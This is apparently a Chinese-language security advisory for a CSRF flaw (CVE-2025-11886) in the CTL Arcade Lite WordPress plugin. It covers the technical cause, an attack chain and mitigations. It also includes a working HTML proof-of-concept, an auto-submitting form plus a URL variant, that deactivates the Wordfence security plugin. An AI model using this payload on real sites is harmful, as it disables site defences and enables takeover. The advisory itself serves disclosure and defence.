CVE-2025-11886 | CTL Arcade Lite WordPress插件CSRF漏洞可激活/停用任意插件

漏洞信息

漏洞编号

CVE-2025-11886

漏洞类型

CSRF (跨站请求伪造)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

CTL Arcade Lite WordPress插件

漏洞概述

CVE-2025-11886是WordPress的CTL Arcade Lite插件中的一个跨站请求伪造（CSRF）安全漏洞。该插件是一款用于创建游戏中心的WordPress插件，在1.0及之前的所有版本中均存在此问题。漏洞的根本原因是在管理游戏的页面（ctl_arcade_lite_page_manage_games）上缺少或存在不正确的CSRF令牌（nonce）验证机制。由于WordPress的nonce机制未能正确实施，攻击者可以构造恶意请求，诱骗已登录的网站管理员在不知情的情况下执行非预期的操作。具体而言，攻击者可以通过社交工程手段（如钓鱼链接），利用管理员的已认证会话，发送伪造的HTTP请求来激活或停用服务器上的任意WordPress插件。这可能导致严重的安全后果，例如停用安全插件（如Wordfence、Sucuri等）以便于后续攻击，或者激活可能存在漏洞的插件以实现进一步入侵。此漏洞不需要攻击者具备任何认证权限，但需要诱导管理员点击恶意链接或访问包含恶意表单的页面。由于该漏洞影响WordPress插件的核心安全控制机制，建议所有使用该插件的用户立即采取修复措施。

技术细节

该CSRF漏洞存在于CTL Arcade Lite插件的页面处理逻辑中。在WordPress插件开发中，为了防止CSRF攻击，开发者通常需要在处理敏感操作（如插件激活/停用）的表单和链接中添加wp_nonce_field()或wp_verify_nonce()函数来生成和验证一次性令牌。然而，该插件在ctl_arcade_lite_page_manage_games页面的处理函数中，要么完全没有实现nonce验证，要么验证逻辑存在缺陷。攻击者可以利用这一缺陷构造一个HTML表单或URL，当管理员访问时，浏览器会自动携带该域名的cookies发送请求。WordPress会根据cookies识别管理员身份并执行请求中指定的操作，例如调用activate_plugin()或deactivate_plugins()函数。由于请求是由合法管理员的浏览器发出的，WordPress会认为这是合法的管理操作。攻击者需要精心构造请求参数，指定要激活或停用的目标插件路径（如plugin-directory/plugin-file.php），然后诱使管理员提交该请求。成功利用此漏洞后，攻击者可以：1）停用所有安全相关插件；2）激活可能存在RCE漏洞的插件；3）停用主要插件导致网站功能中断。

攻击链分析

STEP 1

步骤1

攻击者创建恶意HTML页面，包含自动提交的表单或链接，指向目标WordPress网站的ctl_arcade_lite_page_manage_games页面

STEP 2

步骤2

攻击者通过钓鱼邮件、社交媒体或其他渠道诱导目标网站的管理员访问该恶意页面

STEP 3

步骤3

管理员的浏览器加载恶意页面后，自动向目标网站发送HTTP请求，由于浏览器会自动携带该域名的cookies，WordPress会识别出管理员身份

STEP 4

步骤4

请求到达目标服务器后，插件由于缺少CSRF nonce验证，直接执行activate_plugin()或deactivate_plugins()函数操作

STEP 5

步骤5

攻击者成功激活/停用指定插件，如停用安全插件Wordfence或激活存在RCE漏洞的插件

STEP 6

步骤6

攻击者利用安全插件被停用的状态，实施进一步攻击，如上传webshell、数据库注入或完全接管网站

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-11886 PoC: CSRF to Deactivate Wordfence Plugin -->
<html>
  <body>
    <h1>CVE-2025-11886 CSRF PoC</h1>
    <p>Click the button below to deactivate wordfence plugin</p>
    
    <form action="http://target-site.com/wp-admin/admin.php?page=ctl_arcade_lite_page_manage_games" method="POST" id="csrfForm">
      <input type="hidden" name="action" value="deactivate" />
      <input type="hidden" name="plugin" value="wordfence/wordfence.php" />
      <input type="hidden" name="_wpnonce" value="" />
      <input type="submit" value="Deactivate Plugin" />
    </form>

    <script>
      // Auto-submit form when page loads
      document.getElementById('csrfForm').submit();
    </script>
  </body>
</html>

<!-- Alternative: URL-based PoC -->
<!-- 
http://target-site.com/wp-admin/admin.php?page=ctl_arcade_lite_page_manage_games&action=deactivate&plugin=wordfence/wordfence.php
-->

影响范围

CTL Arcade Lite <= 1.0 (所有版本)

防御指南

临时缓解措施

如果无法立即升级插件，可以采取以下临时缓解措施：1）删除或禁用CTL Arcade Lite插件；2）使用WordPress防火墙规则阻止对ctl_arcade_lite_page_manage_games页面的可疑请求；3）限制管理员账户的使用，定期清理认证会话；4）启用双因素认证（2FA）增加账户安全；5）监控wp-admin日志关注异常的插件激活/停用行为。建议在可行的情况下尽快迁移到其他更安全的游戏插件或自行开发替代方案。